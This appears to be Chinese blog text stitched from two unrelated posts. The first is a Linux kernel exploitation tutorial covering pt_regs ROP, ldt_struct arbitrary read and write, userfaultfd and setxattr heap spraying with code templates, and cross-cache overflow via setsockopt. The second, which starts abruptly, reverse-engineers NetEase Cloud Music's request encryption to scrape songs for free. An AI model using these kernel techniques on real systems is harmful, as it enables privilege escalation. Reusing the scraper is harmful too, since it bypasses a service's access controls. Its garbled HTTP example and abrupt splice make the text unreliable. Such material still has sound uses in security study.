unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
unsigned long r11;
unsigned long r10;
unsigned long r9;
unsigned long r8;
unsigned long rax;
unsigned long rcx;
unsigned long rdx;
unsigned long rsi;
unsigned long rdi;
/*
* On syscall entry, this is syscall#. On CPU exception, this is error code.
* On hw interrupt, it's IRQ number:
*/
unsigned long orig_rax;
/* Return frame for iretq */
unsigned long rip;
unsigned long cs;
unsigned long eflags;
unsigned long rsp;
unsigned long ss;
/* top of stack page */
};

用以在 Kernel Stack 中保存异常发生时的现场寄存器信息,其具体定义与 CPU 架构相关

  • 在调用 SYSCALL 时,内核会将 pt_regs 结构体压栈
  • PS:内核发生异常时,输出的 debug 信息就是通过 show_regs(regs) 来打印的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
SYM_CODE_START(entry_SYSCALL_64)
UNWIND_HINT_EMPTY

swapgs
/* 将用户栈偏移保存到per-cpu变量rsp_scratch中 */
movq %rsp, PER_CPU_VAR(cpu_tss_rw + TSS_sp2)
SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp
movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp

/* 在栈中倒序构建struct pt_regs */
pushq $__USER_DS /* pt_regs->ss */
pushq PER_CPU_VAR(cpu_tss_rw + TSS_sp2) /* pt_regs->sp */
pushq %r11 /* pt_regs->flags */
pushq $__USER_CS /* pt_regs->cs */
pushq %rcx /* pt_regs->ip */
SYM_INNER_LABEL(entry_SYSCALL_64_after_hwframe, SYM_L_GLOBAL)
pushq %rax /* pt_regs->orig_ax */

PUSH_AND_CLEAR_REGS rax=$-ENOSYS

/* 保存参数到寄存器,调用do_syscall_64函数 */
movq %rax, %rdi
movq %rsp, %rsi
call do_syscall_64 /* returns with IRQs disabled */

/*
如果我们要返回到完全干净的64位用户空间上下文,请尝试使用SYSRET而不是IRET
如果我们不是,请转到缓慢的退出路径
*/
movq RCX(%rsp), %rcx
movq RIP(%rsp), %r11

cmpq %rcx, %r11 /* SYSRET requires RCX == RIP */
jne swapgs_restore_regs_and_return_to_usermode

#ifdef CONFIG_X86_5LEVEL
ALTERNATIVE "shl $(64 - 48), %rcx; sar $(64 - 48), %rcx", \
"shl $(64 - 57), %rcx; sar $(64 - 57), %rcx", X86_FEATURE_LA57
#else
shl $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
sar $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
#endif

/* 如果这改变了%rcx,它不是规范的 */
cmpq %rcx, %r11
jne swapgs_restore_regs_and_return_to_usermode

cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */
jne swapgs_restore_regs_and_return_to_usermode

movq R11(%rsp), %r11
cmpq %r11, EFLAGS(%rsp) /* R11 == RFLAGS */
jne swapgs_restore_regs_and_return_to_usermode


testq $(X86_EFLAGS_RF|X86_EFLAGS_TF), %r11
jnz swapgs_restore_regs_and_return_to_usermode

/* nothing to check for RSP */

cmpq $__USER_DS, SS(%rsp) /* SS must match SYSRET */
jne swapgs_restore_regs_and_return_to_usermode

syscall_return_via_sysret:
/* RCX和R11已经恢复(见上面的代码) */
POP_REGS pop_rdi=0 skip_r11rcx=1

/*
现在,除RSP和RDI之外的所有寄存器都已恢复
保存旧的stack指针并切换到trampoline stack
*/
movq %rsp, %rdi
movq PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
UNWIND_HINT_EMPTY

pushq RSP-RDI(%rdi) /* RSP */
pushq (%rdi) /* RDI */

/*
我们在trampoline stack上,除RDI之外的所有寄存器都是实时的
我们可以在这里做未来的最终退出工作
*/
STACKLEAK_ERASE_NOCLOBBER

SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

popq %rdi
popq %rsp
USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
  • 而在系统调用当中过程有很多的寄存器其实是不一定能用上的,比如 r8 ~ r15
  • 这些寄存器为我们布置 ROP 链提供了可能

利用:

  • 通常和 seq_operations 配合使用
  • 使用 __asm__ 操控寄存器,然后在末尾写入一个 syscall 用于调用 read(seq_fd,rsp,8) 以触发 seq_operations->start(需要再此处设置一个类似于 add rsp, xxx; ret; 的 Gadget 来将控制流迁移到我们的 ROP 上)
  • 此时 pt_regs 压栈,同时也将我们布置的 ROP 压栈,seq_operations->start 上的 Gadget 用于完成迁移
  • PS:由于 read(seq_fd,rsp,8) 会破坏我们布置的 pt_regs 结构,因此具体的 ROP 链需要根据调试信息进行微调

ldt_struct RAA + WAA

1
2
3
4
5
struct ldt_struct {
struct desc_struct *entries;
unsigned int nr_entries;
int slot;
};
  • 在局部段描述符表中有许多的段描述符,用 desc_struct 进行描述:
1
2
3
4
5
6
struct desc_struct {
u16 limit0;
u16 base0;
u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1;
u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8;
} __attribute__((packed));

RAA

Linux 提供了 modify_ldt 系统调用,用于获取或修改当前进程的 LDT

  • 内核源码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
unsigned long , bytecount)
{
int ret = -ENOSYS;

switch (func) {
case 0:
ret = read_ldt(ptr, bytecount); /* 内核任意地址读 */
break;
case 1:
ret = write_ldt(ptr, bytecount, 1); /* 分配新的ldt_struct结构体 */
break;
case 2:
ret = read_default_ldt(ptr, bytecount);
break;
case 0x11:
ret = write_ldt(ptr, bytecount, 0);
break;
}

return (unsigned int)ret;
}
  • 其中我们可以利用的两个函数就是 read_ldtwrite_ldt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static int read_ldt(void __user *ptr, unsigned long bytecount)
{
struct mm_struct *mm = current->mm;
unsigned long entries_size;
int retval;

......

if (copy_to_user(ptr, mm->context.ldt->entries, entries_size)) {
retval = -EFAULT;
goto out_unlock;
}

......

out_unlock:
up_read(&mm->context.ldt_usr_sem);
return retval;
}
  • 劫持 mm->context.ldt->entries 就可以实现任意读(ldt_struct->entries
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
static int write_ldt(void __user *ptr, unsigned long bytecount, int oldmode)
{
struct mm_struct *mm = current->mm;
struct ldt_struct *new_ldt, *old_ldt;
unsigned int old_nr_entries, new_nr_entries;
struct user_desc ldt_info;
struct desc_struct ldt;
int error;

......

old_ldt = mm->context.ldt;
old_nr_entries = old_ldt ? old_ldt->nr_entries : 0;
new_nr_entries = max(ldt_info.entry_number + 1, old_nr_entries);

error = -ENOMEM;
new_ldt = alloc_ldt_struct(new_nr_entries); /* 为新的ldt_struct分配空间 */

......

}

static struct ldt_struct *alloc_ldt_struct(unsigned int num_entries)
{
struct ldt_struct *new_ldt;
unsigned int alloc_size;

if (num_entries > LDT_ENTRIES)
return NULL;

new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);

......

}
  • write_ldt 中会调用 alloc_ldt_struct,然后执行一个 kmalloc(可以被 UAF 控制)

利用 modify_ldt 泄露内核地址的思路如下:

  • 申请并释放有 UAF 的堆块
  • 执行 write_ldt,使在 alloc_ldt_struct 中申请的 ldt_struct 填充 UAF 堆块
  • 利用 UAF 控制 ldt_struct->entries,然后使用 read_ldt 把数据读到用户态

在实际的利用中,只能在 ldt_struct->entries 中爆破数据

  • 命中无效的地址:copy_to_user 返回非 0 值,此时 read_ldt 的返回值便是 -EFAULT
  • 命中内核空间:read_ldt 执行成功

但我们不能直接爆破内核基地址,只能先爆破线性映射区 direct mapping area(kmalloc 使用的空间),然后通过 read_ldt 在堆上读取一些可利用的内核指针并泄露内核基地址

  • 通常情况下内核会开启 hardened usercopy 保护,当 copy_to_user 的源地址为内核 .text 段(包括 _stext_etext)时会引起 kernel panic
  • 一般情况下 page_offset_base + 0x9d000 处固定存放着 secondary_startup_64 函数的地址(kernel_base = secondary_startup_64 - 0x40

WAA(不推荐)

利用条件竞争可以在 write_ldt 中实现任意写:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static int write_ldt(void __user *ptr, unsigned long bytecount, int oldmode)
{

......

old_ldt = mm->context.ldt;
old_nr_entries = old_ldt ? old_ldt->nr_entries : 0;
new_nr_entries = max(ldt_info.entry_number + 1, old_nr_entries);

error = -ENOMEM;
new_ldt = alloc_ldt_struct(new_nr_entries);
if (!new_ldt)
goto out_unlock;

if (old_ldt)
memcpy(new_ldt->entries, old_ldt->entries, old_nr_entries * LDT_ENTRY_SIZE);

new_ldt->entries[ldt_info.entry_number] = ldt;

......

}
  • 基础的逻辑为:
    • 新申请一个 ldt_struct
    • 执行 memcpy 把旧的 ldt_struct 数据拷贝到新的 ldt_struct
  • 注意最后一句 new_ldt->entries[ldt_info.entry_number] = ldt
    • ldt 是我们写入的数据
  • 通过条件竞争的方式在 memcpy 过程中将 new_ldt->entries 更改为我们的目标地址从而完成任意地址写,即 Double Fetch

userfaultfd + setxattr

userfaultfd 是 Linux 的一个系统调用,使用户可以通过自定义的页处理程序 page fault handler 在用户态处理缺页异常

setxattr 在 kernel 中可以为我们提供近乎任意大小的内核空间 object 分配

  • 调用链如下:
1
SYS_setxattr() -> path_setxattr() -> setxattr()
  • 核心代码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
size_t size, int flags)
{
//...
kvalue = kvmalloc(size, GFP_KERNEL); /* 分配object */
if (!kvalue)
return -ENOMEM;
if (copy_from_user(kvalue, value, size)) { /* 向内核写入内容 */

//...

kvfree(kvalue); /* 释放object */
return error;
}

那么这里 setxattr 系统调用便提供给我们这样一条调用链:

  • 在内核空间分配 object
  • 向 object 内写入内容
  • 释放分配的 object

这里的 value 和 size 都是由我们来指定的,即我们可以分配任意大小的 object 并向其中写入内容

堆占位技术就是用 setxattr 和 userfaultfd 配合使用得来的,可以在内核空间中分配任意大小的 object 并写入任意内容

在 setxattr 的执行流程,其中会调用 copy_from_user 从用户空间拷贝数据,通过这一点可以构造出如下的利用:

  • 我们通过 mmap 分配连续的两个页面:
    • 在第二个页面上启用 userfaultfd 监视
    • 在第一个页面的末尾写入我们想要的数据
  • 此时我们调用 setxattr 进行跨页面的拷贝,当 copy_from_user 拷贝到第二个页面时便会触发 userfaultfd
  • 从而让 setxattr 的执行流程卡在此处,这样这个 object 就不会被释放掉,而是可以继续参与我们接下来的利用

堆占位一般用于 UAF 漏洞,当内核产生 UAF 堆块时,可以用堆占位技术将一个 object 放入其中,之后通过 UAF 漏洞就可以操控这个 object

注册 userfaultfd 的模板如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
void register_userfault(void * addr, unsigned long len, void (*handler)(void*))
{
pthread_t thr;
struct uffdio_api ua;
struct uffdio_register ur;
long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); /* 生成一个userfaultfd */

ua.api = UFFD_API;
ua.features = 0;
if (ioctl(uffd, UFFDIO_API, &ua) == -1){
/* 用户空间将在UFFD上使用READ/POLLIN协议 */
errExit("ioctl-UFFDIO_API");
}

ur.range.start = (unsigned long)addr;
ur.range.len = len;
ur.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1){
/* 调用UFFDIO_REGISTER ioctl完成注册 */
errExit("ioctl-UFFDIO_REGISTER");
}

int s = pthread_create(&thr, NULL, handler, (void *)uffd); /* 启动一个用以进行轮询的线程uffd monitor,该线程会通过poll函数(Linux中的字符设备驱动中的一个函数)不断轮询直到出现缺页异常 */
if (s != 0) {
errExit("pthread_create");
}
}

处理函数 handler 的模板如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
void* handler(void *arg)
{
struct uffd_msg msg;
struct pollfd pollfd;
struct uffdio_copy uc;
int nready;

unsigned long uffd = (unsigned long)arg;

pollfd.fd = uffd;
pollfd.events = POLLIN;

nready = poll(&pollfd, 1, -1); /* 调用poll函数轮询直到出现缺页异常 */
if (nready != 1) {
errExit("[-] Wrong pool return value");
}

nready = read(uffd, &msg, sizeof(msg)); /* 通过userfaultfd读取缺页信息 */
if (nready <= 0) {
errExit("[-] msg error!!");
}

char *page = (char*)mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("[-] mmap page error!!");

memset(page, 0, sizeof(page));

/*
...... (核心功能)
*/

uc.src = (unsigned long)page;
uc.dst = (unsigned long)msg.arg.pagefault.address & ~(PAGE_SIZE - 1);;
uc.len = PAGE_SIZE;
uc.mode = 0;
uc.copy = 0;

ioctl(uffd, UFFDIO_COPY, &uc);

return NULL;
}

cross-cache overflow + setsockopt

Cross-Cache Overflow

Cross-Cache Overflow 本质上是针对 buddy system 完成对 slub 攻击的利用手法

伙伴系统 buddy system 的机制如下:

  • 把系统中要管理的物理内存按照页面个数分为了11个组,分别对应11种大小不同的连续内存块,每组中的内存块大小都相等,且必须是2的n次幂 (Pow(2, n)),即 1, 2, 4, 8, 16, 32, 64, 128 … 1024
  • 那么系统中就存在 2^0~2^10 这么11种大小不同的内存块,对应内存块大小为 4KB ~ 4M,内核用11个链表来管理11种大小不同的内存块(这11个双向链表都存储在 free_area 中)
  • 在操作内存时,经常将这些内存块分成大小相等的两个块,分成的两个内存块被称为伙伴块,采用 “一位二进制数” 来表示它们的伙伴关系(这个 “一位二进制数” 存储在位图 bitmap 中)
  • 系统根据该位为 “0” 或位为 “1” 来决定是否使用或者分配该页面块,系统每次分配和回收伙伴块时都要对它们的伙伴位跟 “1” 进行异或运算

Cross-Cache Overflow 就是为了实现跨 kmem_cache 溢出的利用手法:

  • slub 底层逻辑是向 buddy system 请求页面后再划分成特定大小 object 返还给上层调用者
  • 但内存中用作不同 kmem_cache 的页面在内存上是有可能相邻的
  • 若我们的漏洞对象存在于页面 A,溢出目标对象存在于页面 B,且 A,B 两页面相邻,则我们便有可能实现跨越不同 kmem_cache 之间的堆溢出

Cross-Cache Overflow 需要两个 page 相邻排版,此时又需要使用另一个技术:页级堆风水

页级堆风水

页级堆风水即以内存页为粒度的内存排布方式,而内核内存页的排布对我们来说不仅未知且信息量巨大,因此这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布

伙伴系统采用一个双向链表数组 free_area 来管理各个空闲块,在分配 page 时有如下的逻辑:

  • free_area 的每个条目都是一个用于管理 2^n 大小空闲块的双向链表,每个 free_area[x] 都有一个 map 位图(用于表示各个伙伴块的关系)
  • 当一个 m page 大小的空间将要被申请时,伙伴系统会首先在 free_area[n] 中查找(刚好满足条件的最小 n)
  • 如果 free_area[n] 中有合适的内存块就直接分配出去,如果没有就继续在 free_area[n+1] 中查找
  • 如果 free_area[n+1] 中有合适的内存块,就会将其均分为两份:
    • 其中一份分配出去
    • 另一个插入 free_area[n] 中
  • 如果 free_area[n+1] 中也没有合适的内存块,则重复上面的过程,如果到达 free_area 数组的末端则放弃分配
  • 如果在 bitmap 中检测到有两个伙伴块都处于空闲状态,则会进行合并,然后插入上级链表

通过伙伴系统的分配流程我们可以发现:互为伙伴块的两片内存块一定是连续的

从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的,由此我们可以:

  • 向 buddy system 请求两份连续的内存页
  • 释放其中一份内存页,在 vulnerable kmem_cache 上堆喷,让其取走这份内存页
  • 释放另一份内存页,在 victim kmem_cache 上堆喷,让其取走这份内存页

这样就可以保证 vulnerable kmem_cachevictim kmem_cache 就一定是连续的

如果想要完成上述操作,就需要使用 setsockopt 与 pgv 完成页级内存占位与堆风水

setsockopt + pgv

函数 setsockopt 用于任意类型,任意状态套接口的设置选项值,其函数原型如下:

1
int setsockopt( int socket, int level, int option_name,const void *option_value, size_t ption_len);
  • socket:套接字
  • level:被设置的选项的级别(如果想要在套接字级别上设置选项,就必须把 level 设置为 SOL_SOCKET)
  • option_name:指定准备设置的“选项”
  • option_value:指向存放选项值的缓冲区(用于设置所选“选项”的值)
  • ption_len:缓冲区的长度
  • 返回值:若无错误发生返回 “0”,否则返回 SOCKET_ERROR 错误(应用程序可通过 WSAGetLastError() 获取相应错误代码)

利用步骤如下:

  • 创建一个 protocol 为 PF_PACKET 的 socket
1
socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
  • 先调用 setsockoptPACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2()
1
setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
  • 再调用 setsockopt 提交一个 PACKET_TX_RING
1
2
3
4
5
6
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));

此时便存在如下调用链:

1
2
3
4
5
__sys_setsockopt()
sock->ops->setsockopt()
packet_setsockopt() // case PACKET_TX_RING ↓
packet_set_ring()
alloc_pg_vec()
  • alloc_pg_vec 中会创建一个 pgv 结构体,用以分配 tp_block_nr 份 2^order 大小的内存页,其中 ordertp_block_size 决定
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • alloc_one_pg_vec_page 中会直接调用 __get_free_pages 向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求

当我们耗尽 buddy system 中的 low order page 后,我们再请求的页面便都是物理连续的,因此此时我们再进行 setsockopt 便相当于获取到了一块近乎物理连续的内存:

  • 不能分配 low order page 时,程序就会从上一级的 free_area 中分配一个内存块
  • 然后等分为两个 low order page,这两个 low order page 就是物理连续的
  • setsockopt 的流程中同样会分配大量我们不需要的结构体,从而消耗 buddy system 的部分页面,产生“噪声”

具体的操作就是利用 setsockopt 申请大量的 1 page 内存块,部分 setsockopt 用于耗尽 low order page,而剩下的就有几率成为连续内存

项目分析

首先,感谢这位大佬的博客:(狗头保命)

『Python』网易云音乐API爬虫 Am0xil的博客-CSDN博客 网易云音乐搜索接口

网易云官方 API 接口地址:https://music.163.com

大佬使用的 API:https://music.163.com/weapi/cloudsearch/get/web?csrf_token=

  • 这个 API 是大佬用 F12 找的
  • 我也找了找,没有找到
  • 当时找到了“web?csrf_token”,但是没有发现歌曲的下载链接

这里我先简述一下服务器请求机制:(之前在CSapp中学到过,也当是复习了吧)

服务器请求

一般的请求消息如下代码所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
GET /home.html HTTP/1.0 <!-- 请求消息行 -->
Accept: */* <!-- 请求消息头 -->
Host: localhost:GET /home.html HTTP/1.0
Accept: */*
Host: localhost:GET /home.html HTTP/1.0
Accept: */*
Host: localhost:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3
Connection: close
Proxy-Connection: close

<html> <!-- 消息正文 -->
<head><title>test</title></head>
<body>
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html>
  • 请求消息行:请求消息的第一行为请求消息行

    • 例如:GET /test/test.html HTTP/1.1
    • GET 为请求方式,请求方式分为:Get(默认)、POST、DELETE、HEAD等
      • GET:明文传输 不安全,数据量有限,不超过1kb
      • POST:暗文传输,安全,数据量没有限制
    • /test/test.html 为URI,统一资源标识符
    • HTTP/1.1 为协议版本
  • 请求消息头:从第二行开始到空白行统称为请求消息头(包含各种信息)

  • 消息正文:当请求方式是[POST]方式时,才能看见消息正文,消息正文就是要传输的一些数据,如果没有数据需要传输时,消息正文为空

服务器响应

一般的响应如下代码所示:

1
2
3
4
5
6
7
8
9
10
11
12
HTTP/1.0 200 OK <!-- 响应消息行 -->
Server: Tiny Web Server <!-- 响应消息头 -->
Content-length: 120
Content-type: text/html

<html> <!-- 响应正文 -->
<head><title>test</title></head>
<body>
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html>
  • 响应消息行:第一行响应消息为响应消息行
    • 例如:HTTP/1.0 200 OK
    • HTTP/1.0 为协议版本
    • 200 为响应状态码,常用的响应状态码有40余种,这里我们仅列出几种,详细请看:
      • 200:一切正常
      • 302/307:临时重定向
      • 304:未修改,客户端可以从缓存中读取数据,无需从服务器读取
      • 404:服务器上不存在客户端所请求的资源
      • 500:服务器内部错误
    • OK 为状态码描述
  • 响应消息头:和请求消息头类似
  • 响应正文:即网页的源代码(F12可查看)

先看看大佬对请求的处理:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
def get_music_list(params, encSecKey):
url = "https://music.163.com/weapi/cloudsearch/get/web?csrf_token="

payload = 'params=' + parse.quote(params) + '&encSecKey=' + parse.quote(encSecKey)
headers = {
'authority': 'music.163.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded',
'accept': '*/*',
'origin': 'https://music.163.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://music.163.com/search/',
'accept-language': 'zh-CN,zh;q=0.9',
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.text


# 通过歌曲的id获取播放链接
def get_reply(params, encSecKey):
url = "https://music.163.com/weapi/song/enhance/player/url/v1?csrf_token="
payload = 'params=' + parse.quote(params) + '&encSecKey=' + parse.quote(encSecKey)
headers = {
'authority': 'music.163.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded',
'accept': '*/*',
'origin': 'https://music.163.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://music.163.com/',
'accept-language': 'zh-CN,zh;q=0.9'
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.text
  • requests.request(method,url,**kwargs) 的参数:
    • method:请求类型(这里是”POST”)
    • url:请求对象的链接(这里是目标 API)
    • headers:请求头,直接 F12 查看,上面有什么条目直接抄
      • PS:我 F12 看到的与作者代码中有不同的地方,但不影响结果
    • data:字典、字节序列或文件对象,作为 Requests 的内容
  • 最后返回服务器响应

大佬这两个函数就是实现了 “获取歌曲列表,获取歌曲播放链接” 的功能(就是 url 不同)

  • 在查找界面 F12 截下的图(这个API和大佬用的不一样,爬取的歌单少一点)
  • 在播放界面 F12 截下的图(不知道大佬是怎么断定它就是播放链接的)
  • 请求头部分截取(主要是 cookie 太长了~)

要说大佬最亮眼的地方,就是对网易云加密算法的破解了(“params”和“encSecKey”)

点开 Headers 后我们可以发现,除了传统的请求头参数外,本次请求还携带了一个 Form 表单,其中有两个参数,分别是 paramsencSecKey

具体来说,是用了 AES 和一些自创的加密算法,本人以前是搞逆向的,所以这些东西还是能应付,就是 JavaScript 有点恼火

搜索 encSecKey 我找到的就是这么一堆东西:

在网上找个格式化网站进行格式化:

搜索“encSecKey”:(最好不要搜索“params”)

1
2
3
4
5
var bKB0x = window.asrsea(JSON.stringify(i1x), buV7O(["流泪", "强"]), buV7O(Rg9X.md), buV7O(["爱心", "女孩", "惊恐", "大笑"]));
e1x.data = j1x.cr2x({
params: bKB0x.encText,
encSecKey: bKB0x.encSecKey
})
  • 把 window.asrsea 实例化为 bKB0x,然后调用其中的方法“encText”,“encSecKey”

搜索“asrsea”:

1
2
3
4
5
6
7
8
9
10
function d(d, e, f, g) {
var h = {},
i = a(16);
return h.encText = b(d, g),
h.encText = b(h.encText, i),
h.encSecKey = c(i, e, f),
h
}

window.asrsea = d, window.ecnonasr = e
  • 定义“encText”函数:
    • 利用“a(16)”获取“i”
    • 进行第一次“b”算法
    • 把“b”算法的结果和“i”作为参数,再进行一次“b”算法
  • 定义“encSecKey”函数:
    • 利用“a(16)”获取“i”
    • 进行一次“c”算法

“a”算法的实现:

1
2
3
4
5
6
function a(a) {
var d, e, b = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
c = "";
for (d = 0; a > d; d += 1) e = Math.random() * b.length, e = Math.floor(e), c += b.charAt(e);
return c
}
  • 从大小写英文字母以及10个数字中随机抽取16个字符拼接成一个新的字符串返回结果

“b”算法的实现:

1
2
3
4
5
6
7
8
9
10
function b(a, b) {
var c = CryptoJS.enc.Utf8.parse(b),
d = CryptoJS.enc.Utf8.parse("0102030405060708"),
e = CryptoJS.enc.Utf8.parse(a),
f = CryptoJS.AES.encrypt(e, c, {
iv: d,
mode: CryptoJS.mode.CBC
});
return f.toString()
}
  • 通过 CBC 模式进行 AES 加密,将传入的 a 参数和 b 参数分别作为需要加密的内容和密钥,iv偏移量为一个固定的字符串“0102030405060708”

“c”算法的实现:(前两个还好,这一串代码直接给我干沉默了…)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
function c(a, b, c) {
var d, e;
return setMaxDigits(131),
d = new RSAKeyPair(b, "", c),
e = encryptedString(d, a)
}

function RSAKeyPair(a, b, c) {
this.e = biFromHex(a),
this.d = biFromHex(b),
this.m = biFromHex(c),
this.chunkSize = 2 * biHighIndex(this.m),
this.radix = 16,
this.barrett = new BarrettMu(this.m)
}

function encryptedString(a, b) {
for (var f, g, h, i, j, k, l, c = new Array, d = b.length, e = 0; d > e;) c[e] = b.charCodeAt(e), e++;
for (; 0 != c.length % a.chunkSize;) c[e++] = 0;
for (f = c.length, g = "", e = 0; f > e; e += a.chunkSize) {
for (j = new BigInt, h = 0, i = e; i < e + a.chunkSize; ++h) j.digits[h] = c[i++], j.digits[h] += c[i++] << 8;
k = a.barrett.powMod(j, a.e), l = 16 == a.radix ? biToHex(k) : biToString(k, a.radix), g += l + " "
}
return g.substring(0, g.length - 1)
}

最后提一下这些函数的参数:(由于我不会断点调试,这里就不展示过程了)

1
2
3
4
d:{"hlpretag":"<span class=\"s-fc7\">","hlposttag":"</span>","s":"Lily","type":"1","offset":"0","total":"true","limit":"30","csrf_token":""}
e:"010001"
f:"00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7"
g:"0CoJUm6Qyw8W8jud"
  • 参数 e,f,g 始终保持不表,由此可见它们是3个常量
  • 只是参数 d 中的歌曲名称在变化

理解完大佬的代码后,我在他的基础上进行了修改:

白嫖网易云_V1.0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
import base64
import binascii
import json
import random
import string
from urllib import parse

import requests
import webbrowser
from Crypto.Cipher import AES

class Music():
def get_random(self):
random_str = ''.join(random.sample(string.ascii_letters + string.digits, 16))
return random_str

def len_change(self,text):
pad = 16 - len(text) % 16
text = text + pad * chr(pad)
text = text.encode("utf-8")
return text

def aes(self,text, key):
iv = b'0102030405060708'
text = self.len_change(text)
cipher = AES.new(key.encode(), AES.MODE_CBC, iv)
encrypted = cipher.encrypt(text)
encrypt = base64.b64encode(encrypted).decode()
return encrypt

def b(self,text, str):
first_data = self.aes(text, '0CoJUm6Qyw8W8jud')
second_data = self.aes(first_data, str)
return second_data

def c(self,text):
e = '010001'
f = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'
text = text[::-1]
result = pow(int(binascii.hexlify(text.encode()), 16), int(e, 16), int(f, 16))
return format(result, 'x').zfill(131)

def get_final_param(self,text, str):
params = self.b(text, str)
encSecKey = self.c(str)
return {'params': params, 'encSecKey': encSecKey}

def get_music_list(self,params, encSecKey):
url = "https://music.163.com/weapi/cloudsearch/get/web?csrf_token="

